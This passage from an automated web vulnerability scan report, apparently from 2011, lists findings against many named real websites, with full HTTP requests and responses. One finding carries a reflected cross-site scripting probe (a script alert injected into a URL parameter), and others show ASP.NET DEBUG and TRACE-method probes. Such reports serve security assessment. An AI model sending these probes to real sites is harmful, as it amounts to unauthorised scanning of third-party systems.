Host:   http://www.watchmouse.com
Path:   /en/

Request

GET /en/ HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:36:24 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-aae30c915a39ee69d50753ca20be732f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 18190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
</a>
<form id="login_form" action="https://secure.watchmouse.com/en/" method="post">
<span id="login_error_row" class="nodisplay error" >
...[SNIP]...
<br /><input name="vpasswd" value="" type="password" size="25" id="vpasswd" class="signinInput " />

<input class="inputfield" name="vaction" id="vaction" type="hidden" value="login" />
...[SNIP]...

8.42. http://www.watchmouse.com/en/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Request

GET /en/?9dda5%22%3E%3Cscript%3Ealert(1)%3C/script%3E6abf1d1d559=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WMCKft=2544066; WMCKsession=b138c266dfd4381417fae4abae564378; __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.5.10.1298770635

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:00:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-9c316ff5d7c01083a1bfaf2ef9e4cb85"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 18071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
</a>
<form id="login_form" action="https://secure.watchmouse.com/en/?9dda5%22%3E%3Cscript%3Ealert(1)%3C/script%3E6abf1d1d559=1" method="post">
<span id="login_error_row" class="nodisplay error" >
...[SNIP]...
<br /><input name="vpasswd" value="" type="password" size="25" id="vpasswd" class="signinInput " />

<input class="inputfield" name="vaction" id="vaction" type="hidden" value="login" />
...[SNIP]...

8.43. http://www.watchmouse.com/en/contact.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/contact.php

Request

GET /en/contact.php HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WMCKft=2544066; WMCKsession=b138c266dfd4381417fae4abae564378; __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.4.10.1298770635

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:41:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-fd32ab90bf7cda124cb6ced0019c9562"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 15990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
</a>
<form id="login_form" action="https://secure.watchmouse.com/en/contact.php" method="post">
<span id="login_error_row" class="nodisplay error" >
...[SNIP]...
<br /><input name="vpasswd" value="" type="password" size="25" id="vpasswd" class="signinInput " />

<input class="inputfield" name="vaction" id="vaction" type="hidden" value="login" />
...[SNIP]...

8.44. http://www.watchmouse.com/en/plans_price.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/plans_price.php

Request

GET /en/plans_price.php HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WMCKft=2544066; WMCKsession=b138c266dfd4381417fae4abae564378; __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.2.10.1298770635

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:36:41 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-fdc3665370965fad73f09b88d4fa72ea"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 54695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
</a>
<form id="login_form" action="https://secure.watchmouse.com/en/plans_price.php" method="post">
<span id="login_error_row" class="nodisplay error" >
...[SNIP]...
<br /><input name="vpasswd" value="" type="password" size="25" id="vpasswd" class="signinInput " />

<input class="inputfield" name="vaction" id="vaction" type="hidden" value="login" />
...[SNIP]...

9. ASP.NET debugging enabled  previous  next
There are 3 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.



9.1. http://usage.apps.conduit-services.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://usage.apps.conduit-services.com
Path:   /Default.aspx

Request

DEBUG /Default.aspx HTTP/1.0
Host: usage.apps.conduit-services.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 27 Feb 2011 03:30:05 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

9.2. http://www.leadlife.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.leadlife.com
Path:   /Default.aspx

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.leadlife.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 28 Feb 2011 17:50:15 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

9.3. http://www.sti-world.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sti-world.com
Path:   /Default.aspx

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.sti-world.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Connection: close
Date: Sat, 26 Feb 2011 23:11:05 GMT
Content-Length: 39
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="www.sti-world.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727

Debug access denied to '/Default.aspx'.

10. File upload functionality  previous  next
There are 2 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:



10.1. http://jigsaw.w3.org/css-validator/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jigsaw.w3.org
Path:   /css-validator/

Request

GET /css-validator/ HTTP/1.1
Host: jigsaw.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Feb 2011 23:10:49 GMT
Content-Length: 18290
Content-Language: en
Content-Location: http://jigsaw.w3.org/css-validator/validator.html.en
Content-Type: text/html;charset=utf-8
Etag: "1esnpgq:15ndjrseg"
Last-Modified: Mon, 31 Jan 2011 08:43:56 GMT
Server: Jigsaw/2.3.0-beta2
Vary: Accept-Language

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
...[SNIP]...
<label title="Choose a Local File to Upload and Validate" for="file">Local CSS file:
<input type="file" id="file" name="file" size="30" /></label>
...[SNIP]...

10.2. http://sstatic.net/Js/wmd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /Js/wmd.js

Request

GET /Js/wmd.js?v=872949b6c535 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://webapps.stackexchange.com/questions/11750/where-are-the-shrinkster-short-url-codes-now
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Sun, 27 Feb 2011 13:07:44 GMT
Accept-Ranges: bytes
ETag: W/"6e45a5527fd6cb1:0"
Vary: Accept-Encoding
Date: Sun, 27 Feb 2011 16:31:20 GMT
Content-Length: 41099

var Attacklab=Attacklab||{};var Attacklab=Attacklab||{};Attacklab.showdown=Attacklab.showdown||{};Attacklab.prePreviewHtmlHook=function(a){return a};Attacklab.postPreviewHtmlHook=function(a){return a}
...[SNIP]...
<div style='position: relative' id='upload-file-input'> <input type='file' name='filename' id='filename-input' value='browse' style='border:0; font-size:18px; position:relative; text-align:right; -moz-opacity:0; filter:alpha(opacity: 0); opacity: 0; z-index: 2;'> <img src='http://i.imgur.com/GKc7H.png' height='15px' width='15px' style='position: absolute; left: 38px; top: 11px;'>
...[SNIP]...

11. TRACE method is enabled  previous  next
There are 33 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.



11.1. http://adam.companypond.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adam.companypond.com
Path:   /

Request

TRACE / HTTP/1.0
Host: adam.companypond.com
Cookie: 6cefd690b9e85e19

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:51:57 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: adam.companypond.com
Cookie: 6cefd690b9e85e19


11.2. http://b.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.aol.com
Path:   /

Request

TRACE / HTTP/1.0
Host: b.aol.com
Cookie: 459d884c7f085f66

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:42:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: b.aol.com
Cookie: 459d884c7f085f66
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:11:3C99:40000000001,x-lb-client-ip:PPP_P


11.3. http://b.winamp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.winamp.com
Path:   /

Request

TRACE / HTTP/1.0
Host: b.winamp.com
Cookie: d02dca4a9f3e4348

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:42:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: b.winamp.com
Cookie: d02dca4a9f3e4348
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:13:D4A4:40000000001,x-lb-client-ip:PPP_P


11.4. http://blog.qwerly.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.qwerly.com
Path:   /

Request

TRACE / HTTP/1.0
Host: blog.qwerly.com
Cookie: 95a3437a74779e99

Response

HTTP/1.1 200 OK
Content-Type: message/http
Content-Length: 141
Date: Tue, 01 Mar 2011 02:59:15 GMT
Connection: close

TRACE / HTTP/1.0
Host: blog.qwerly.com
Cookie: 95a3437a74779e99
X-Forwarded-For: 173.193.214.243, 67.192.122.100
X-Varnish: 490729809


11.5. http://capgeminicom.112.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicom.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: capgeminicom.112.2o7.net
Cookie: dc74075a5ed16cbb

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:16 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: capgeminicom.112.2o7.net
Cookie: dc74075a5ed16cbb
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


11.6. http://capgeminicomglobal.112.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: capgeminicomglobal.112.2o7.net
Cookie: 6f6f9651efd42d43

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:11 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: capgeminicomglobal.112.2o7.net
Cookie: 6f6f9651efd42d43
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


11.7. https://client.trafficshaping.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.trafficshaping.com
Path:   /

Request

TRACE / HTTP/1.0
Host: client.trafficshaping.com
Cookie: 53251b56e15fcae0

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:43:44 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: client.trafficshaping.com
Cookie: 53251b56e15fcae0


11.8. http://companypond.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://companypond.com
Path:   /

Request

TRACE / HTTP/1.0
Host: companypond.com
Cookie: b09d33938de3384a

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:43:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: companypond.com
Cookie: b09d33938de3384a


11.9. http://creativecommons.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creativecommons.org
Path:   /

Request

TRACE / HTTP/1.0
Host: creativecommons.org
Cookie: 1b6e8b3bba70e2c4

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 130
Date: Sat, 26 Feb 2011 23:11:09 GMT
X-Varnish: 1841709331
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Host: creativecommons.org
Cookie: 1b6e8b3bba70e2c4
X-Forwarded-For: 173.193.214.243
X-Varnish: 1841709331


11.10. http://forums.winamp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.winamp.com
Path:   /

Request

TRACE / HTTP/1.0
Host: forums.winamp.com
Cookie: 9dc6b393ed02c590

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:42:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: forums.winamp.com
Cookie: 9dc6b393ed02c590
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:14:9D7:200482:ajgu


11.11. http://image2.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 2ff52fcc9797c2a

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:20:46 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 2ff52fcc9797c2a


11.12. http://jigsaw.w3.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jigsaw.w3.org
Path:   /

Request

TRACE / HTTP/1.0
Host: jigsaw.w3.org
Cookie: 66d3191002b5026b

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: keep-alive,close
Date: Sat, 26 Feb 2011 23:10:50 GMT
Content-Length: 104
Content-Type: message/http
Server: Jigsaw/2.3.0-beta2

TRACE / HTTP/1.0
Date: Sat, 26 Feb 2011 23:10:50 GMT
Cookie: 66d3191002b5026b
Host: jigsaw.w3.org


11.13. http://lilypad-cdn.cranberry.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /

Request

TRACE / HTTP/1.0
Host: lilypad-cdn.cranberry.com
Cookie: 2356e0644d6956a5

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:45:00 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: lilypad-cdn.cranberry.com
Cookie: 2356e0644d6956a5


11.14. http://lilypad.cranberry.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad.cranberry.com
Path:   /

Request

TRACE / HTTP/1.0
Host: lilypad.cranberry.com
Cookie: 140dbd0436da92fd

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:49:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: lilypad.cranberry.com
Cookie: 140dbd0436da92fd


11.15. https://login.oracle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /

Request

TRACE / HTTP/1.0
Host: login.oracle.com
Cookie: c2cb85a4bd0bc76a

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerloginadc_oracle_com_http=1997378189.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/

TRACE / HTTP/1.0
Cookie: c2cb85a4bd0bc76a
Host: login.oracle.com


11.16. http://mail.ioerror.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.ioerror.us
Path:   /

Request

TRACE / HTTP/1.0
Host: mail.ioerror.us
Cookie: b64c7ef800e8304c

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:11:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: mail.ioerror.us
Cookie: b64c7ef800e8304c


11.17. https://mix.oracle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mix.oracle.com
Path:   /

Request

TRACE / HTTP/1.0
Host: mix.oracle.com
Cookie: 1201af05a902581b

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:29:21 GMT
Server: GlassFish Server Open Source Edition 3.0.1
X-Powered-By: Servlet/3.0
Content-Type: message/http
Content-Length: 194
Connection: close
Set-Cookie: BIGipServermix-new_oracle_com_http=3274216077.7975.0000; expires=Sun, 27-Feb-2011 07:29:21 GMT; path=/

TRACE / HTTP/1.1
connection: Keep-Alive
x-forwarded-host: mix.oracle.com
x-forwarded-server: mix.oracle.com
cookie: 1201af05a902581b
host: localhost:8080
x-forwarded-for: 173.193.214.243

11.18. http://networksolutions.112.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://networksolutions.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: networksolutions.112.2o7.net
Cookie: ad001a73864fcfa6

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:21 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: networksolutions.112.2o7.net
Cookie: ad001a73864fcfa6
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


11.19. http://o.sa.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /

Request

TRACE / HTTP/1.0
Host: o.sa.aol.com
Cookie: f8af26658bbe3204

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:31:48 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: o.sa.aol.com
Cookie: f8af26658bbe3204
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


11.20. http://peoplepond.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplepond.com
Path:   /

Request

TRACE / HTTP/1.0
Host: peoplepond.com
Cookie: c1b86f4455d93da5

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:43:46 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: peoplepond.com
Cookie: c1b86f4455d93da5


11.21. http://referrals.fusionbot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://referrals.fusionbot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: referrals.fusionbot.com
Cookie: 7929e1df0e8798a9

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:02:08 GMT
Server: Apache/2.0.54 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: referrals.fusionbot.com
Cookie: 7929e1df0e8798a9


11.22. http://segs.btrll.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /

Request

TRACE / HTTP/1.0
Host: segs.btrll.com
Cookie: 4c7a049000d2db4b

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:25:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: segs.btrll.com
Cookie: 4c7a049000d2db4b
X-EKC-SRM-ARM: 173.193.214.243


11.23. http://statistics.wibiya.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statistics.wibiya.com
Path:   /

Request

TRACE / HTTP/1.0
Host: statistics.wibiya.com
Cookie: 4ddbe988e1f8907d

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: statistics.wibiya.com
Cookie: 4ddbe988e1f8907d


11.24. http://tacoda.at.atwola.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tacoda.at.atwola.com
Cookie: efc15a943d34a7fb

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:32:34 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http
X-Pad: avoid browser bug

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: efc15a943d34a7fb
Host: tacoda.at.atwola.com
X-Forwarded-For: 173.193.214.243
X-LB-Client-IP: 173.193.214.243


11.25. http://tetlaw.id.au/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tetlaw.id.au
Path:   /

Request

TRACE / HTTP/1.0
Host: tetlaw.id.au
Cookie: 36fbe1610422b3ab

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:11:06 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tetlaw.id.au
Cookie: 36fbe1610422b3ab


11.26. http://widgets.digg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: 14bf87426923f864

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:32:53 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 14bf87426923f864
Accept-Encoding: gzip
Connection: Keep-Alive
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.14
x-chpd-loop: 1
Via: 1.0 PXY003-ASHB.COTENDO.NET (chpd/3
...[SNIP]...

11.27. http://wstat.wibiya.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wstat.wibiya.com
Path:   /

Request

TRACE / HTTP/1.0
Host: wstat.wibiya.com
Cookie: f49ec948021ee809

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: wstat.wibiya.com
Cookie: f49ec948021ee809


11.28. http://www.companypond.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.companypond.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.companypond.com
